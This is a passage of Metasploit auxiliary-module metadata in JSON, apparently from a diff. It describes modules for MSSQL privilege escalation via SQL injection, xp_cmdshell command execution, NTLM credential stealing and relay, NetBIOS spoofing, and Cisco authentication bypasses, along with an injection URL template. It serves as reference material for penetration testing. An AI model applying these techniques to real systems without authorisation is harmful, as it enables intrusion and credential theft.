can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. 
Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_dbowner_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_execute_as": { - "name": "Microsoft SQL Server Escalate EXECUTE AS", - "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. 
In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_execute_as", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": { - "name": "Microsoft SQL Server SQLi Escalate Execute AS", - "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. 
In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_execute_as_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_exec": { - "name": "Microsoft SQL Server Command Execution", - "fullname": "auxiliary/admin/mssql/mssql_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "tebo ", - "arcc " - ], - "description": "This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the\n sp_oacreate procedure (more opsec safe, no output, no temporary data table). 
A valid username and password is\n required to use this module.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx", - "URL-https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_findandsampledata": { - "name": "Microsoft SQL Server Find and Sample Data", - "fullname": "auxiliary/admin/mssql/mssql_findandsampledata", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Scott Sutherland ", - "Robin Wood ", - "humble-desser ", - "Carlos Perez ", - "hdm ", - "todb " - ], - "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. 
The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.", - "references": [ - "URL-http://www.netspi.com/blog/author/ssutherland/" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_findandsampledata", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_idf": { - "name": "Microsoft SQL Server Interesting Data Finder", - "fullname": "auxiliary/admin/mssql/mssql_idf", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Robin Wood " - ], - "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).", - "references": [ - "URL-http://www.digininja.org/metasploit/mssql_idf.php" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_idf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_ntlm_stealer": { - "name": "Microsoft SQL Server NTLM Stealer", - "fullname": 
"auxiliary/admin/mssql/mssql_ntlm_stealer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. 
Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.", - "references": [ - "URL-https://en.wikipedia.org/wiki/SMBRelay" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_ntlm_stealer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": { - "name": "Microsoft SQL Server SQLi NTLM Stealer", - "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "Antti " - ], - "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. 
However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.", - "references": [ - "URL-https://en.wikipedia.org/wiki/SMBRelay" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_ntlm_stealer_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_sql": { - "name": "Microsoft SQL Server Generic Query", - "fullname": "auxiliary/admin/mssql/mssql_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "tebo " - ], - "description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.", - "references": [ - "URL-http://www.attackresearch.com", - "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_sql_file": { - "name": "Microsoft SQL Server Generic Query from File", - "fullname": 
"auxiliary/admin/mssql/mssql_sql_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "j0hn__f : " - ], - "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_sql_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mysql/mysql_enum": { - "name": "MySQL Enumeration Module", - "fullname": "auxiliary/admin/mysql/mysql_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.", - "references": [ - "URL-https://cisecurity.org/benchmarks.html" - ], - "platform": "", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-03-28 10:34:38 +0000", - "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", - "is_install_path": true, - "ref_name": "admin/mysql/mysql_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mysql/mysql_sql": { - "name": "MySQL SQL Generic Query", - "fullname": "auxiliary/admin/mysql/mysql_sql", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Bernardo Damele A. G. " - ], - "description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.", - "references": [], - "platform": "", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-02-14 15:26:34 +0000", - "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", - "is_install_path": true, - "ref_name": "admin/mysql/mysql_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/natpmp/natpmp_map": { - "name": "NAT-PMP Port Mapper", - "fullname": "auxiliary/admin/natpmp/natpmp_map", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP", - "references": [], - "platform": "", - "arch": "", - "rport": 5351, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", - "is_install_path": true, - "ref_name": "admin/natpmp/natpmp_map", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/netbios/netbios_spoof": { - "name": "NetBIOS Response Brute Force Spoof (Direct)", - "fullname": "auxiliary/admin/netbios/netbios_spoof", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "vvalien", - "hdm ", - "tombkeeper" - ], - "description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. 
On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.", - "references": [], - "platform": "", - "arch": "", - "rport": 137, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", - "is_install_path": true, - "ref_name": "admin/netbios/netbios_spoof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/arista_config": { - "name": "Arista Configuration Importer", - "fullname": "auxiliary/admin/networking/arista_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an Arista device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/arista_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/arista_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/brocade_config": { - "name": "Brocade Configuration Importer", - "fullname": "auxiliary/admin/networking/brocade_config", - "aliases": [ - "auxiliary/admin/brocade/brocade_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module 
imports a Brocade device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/networking/brocade_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/brocade_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_asa_extrabacon": { - "name": "Cisco ASA Authentication Bypass (EXTRABACON)", - "fullname": "auxiliary/admin/networking/cisco_asa_extrabacon", - "aliases": [ - "auxiliary/admin/cisco/cisco_asa_extrabacon" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Sean Dillon ", - "Zachary Harding ", - "Nate Caroe ", - "Dylan Davis ", - "William Webb ", - "Jeff Jarmoc ", - "Equation Group", - "Shadow Brokers" - ], - "description": "This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.", - "references": [ - "CVE-2016-6366", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp", - "URL-https://github.com/RiskSense-Ops/CVE-2016-6366" - ], - "platform": "", - "arch": "", - "rport": 161, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_asa_extrabacon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "EXTRABACON" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "PASS_DISABLE", - "description": "Disable password authentication." 
- }, - { - "name": "PASS_ENABLE", - "description": "Enable password authentication." - } - ] - }, - "auxiliary_admin/networking/cisco_config": { - "name": "Cisco Configuration Importer", - "fullname": "auxiliary/admin/networking/cisco_config", - "aliases": [ - "auxiliary/admin/cisco/cisco_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Cisco IOS or NXOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_dcnm_auth_bypass": { - "name": "Cisco DCNM auth bypass", - "fullname": "auxiliary/admin/networking/cisco_dcnm_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-01", - "type": "auxiliary", - "author": [ - "MR_ME", - "Yann Castel (yann.castel " - ], - "description": "This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.\n After that, you can login to the web interface with those credentials.\n The only necessary condition is the more or less recent connection of an admin as this exploit\n uses a kind of session stealing.", - "references": [ - "CVE-2019-15975", - "EDB-48018" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-31 23:53:41 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb", - 
"is_install_path": true, - "ref_name": "admin/networking/cisco_dcnm_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_dcnm_download": { - "name": "Cisco Data Center Network Manager Unauthenticated File Download", - "fullname": "auxiliary/admin/networking/cisco_dcnm_download", - "aliases": [ - "auxiliary/admin/cisco/cisco_dcnm_download" - ], - "rank": 300, - "disclosure_date": "2019-06-26", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n the full path of the file.\n This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n work on a few versions below 10.4(2). 
Only version 11.0(1) requires authentication to exploit\n (see References to understand why).", - "references": [ - "CVE-2019-1619", - "CVE-2019-1621", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt", - "URL-https://seclists.org/fulldisclosure/2019/Jul/7" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-13 18:55:39 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_dcnm_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_secure_acs_bypass": { - "name": "Cisco Secure ACS Unauthorized Password Change", - "fullname": "auxiliary/admin/networking/cisco_secure_acs_bypass", - "aliases": [ - "auxiliary/admin/cisco/cisco_secure_acs_bypass" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jason Kratzer " - ], - "description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.", - "references": [ - "BID-47093", - "CVE-2011-0951", - "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 
443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-07-16 05:43:52 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_secure_acs_bypass", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": { - "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access", - "fullname": "auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass", - "aliases": [ - "auxiliary/admin/cisco/vpn_3000_ftp_bypass" - ], - "rank": 300, - "disclosure_date": "2006-08-23", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. 
This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.", - "references": [ - "BID-19680", - "CVE-2006-4313", - "OSVDB-28139", - "OSVDB-28138" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/f5_config": { - "name": "F5 Configuration Importer", - "fullname": "auxiliary/admin/networking/f5_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an F5 device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/f5_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/f5_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/juniper_config": { - "name": "Juniper Configuration Importer", - "fullname": "auxiliary/admin/networking/juniper_config", - "aliases": [ - "auxiliary/admin/juniper/juniper_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - 
"author": [ - "h00die" - ], - "description": "This module imports a Juniper ScreenOS or JunOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/juniper_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/juniper_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "JUNOS", - "description": "Import JunOS Config File" - }, - { - "name": "SCREENOS", - "description": "Import ScreenOS Config File" - } - ] - }, - "auxiliary_admin/networking/mikrotik_config": { - "name": "Mikrotik Configuration Importer", - "fullname": "auxiliary/admin/networking/mikrotik_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Mikrotik device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/mikrotik_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ROUTEROS", - "description": "Import RouterOS Config File" - }, - { - "name": "SWOS", - "description": "Import SwOS Config File" - } - ] - }, - "auxiliary_admin/networking/ubiquiti_config": { - "name": "Ubiquiti Configuration Importer", - "fullname": 
"auxiliary/admin/networking/ubiquiti_config", - "aliases": [ - "auxiliary/admin/ubiquiti/ubiquiti_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an Ubiquiti device configuration.\n The db file within the .unf backup is the data file for\n Unifi. This module can take either the db file or .unf.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-23 11:32:45 +0000", - "path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/ubiquiti_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/vyos_config": { - "name": "VyOS Configuration Importer", - "fullname": "auxiliary/admin/networking/vyos_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a VyOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/vyos_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/vyos_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/officescan/tmlisten_traversal": { - "name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access", 
